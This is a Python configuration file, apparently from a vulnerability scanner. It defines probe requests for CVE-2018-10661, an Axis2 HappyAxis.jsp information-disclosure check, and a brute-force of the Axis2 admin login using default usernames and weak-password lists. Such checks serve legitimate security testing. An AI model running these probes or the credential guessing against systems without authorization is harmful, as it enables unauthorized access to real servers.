2019-03-28 23:56:13 +08:00
|
|
|
#coding=utf-8
|
|
|
|
|
pocs=[
|
|
|
|
|
{"requests_option":"GET",
|
|
|
|
|
"url":["/index.html/a.srv"],
|
|
|
|
|
"params":[],
|
|
|
|
|
"data":["action=abc&return_page=it_worked"],
|
|
|
|
|
"flag":["it_worked"],
|
|
|
|
|
"success":"exist CVE_2018_10661",
|
|
|
|
|
"fail":"Not exist CVE_2018_10661",
|
|
|
|
|
"end":"CVE_2018_10661 测试结束",
|
|
|
|
|
"admin_bursk":"",
|
|
|
|
|
"username":'',
|
|
|
|
|
"password":"",
|
|
|
|
|
},
|
|
|
|
|
{"requests_option":"GET",
|
|
|
|
|
"url":["/axis2/axis2-web/HappyAxis.jsp"],
|
|
|
|
|
"params":[],
|
|
|
|
|
"data":[],
|
|
|
|
|
"flag":["Axis2 Happiness Page"],
|
|
|
|
|
"success":"exist Axis Information Disclosure,/axis2/axis2-web/HappyAxis.jsp",
|
|
|
|
|
"fail":"NOT exist /axis2/axis2-web/HappyAxis.jsp",
|
|
|
|
|
"end":"/axis2/axis2-web/HappyAxis.jsp信息扫描完成",
|
|
|
|
|
"admin_bursk":"",
|
|
|
|
|
"username":'',
|
|
|
|
|
"password":"",
|
|
|
|
|
},
|
|
|
|
|
{"requests_option":"POST",
|
|
|
|
|
"url":["/axis2/axis2-admin/login"],
|
|
|
|
|
"params":[],
|
|
|
|
|
"data":["userName=%s&password=%s&submit=+Login+"],
|
|
|
|
|
"flag":['Administration Page</title>', 'System Components', 'axis2-admin/upload','include page=\'footer.inc\'>', 'axis2-admin/logout'],
|
|
|
|
|
"success":"/axis2/axis2-admin/login存在弱口令",
|
|
|
|
|
"fail":"/axis2/axis2-admin/login不存在弱口令",
|
|
|
|
|
"end":"/axis2/axis2-admin/login弱口令扫描完成",
|
|
|
|
|
"admin_bursk":"True",
|
2019-03-30 23:03:09 +08:00
|
|
|
"username":['axis_plugin_catalog', 'admin', 'manager', 'root'],
|
|
|
|
|
"password":['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'],
|
2019-03-28 23:56:13 +08:00
|
|
|
},
|
|
|
|
|
]
|
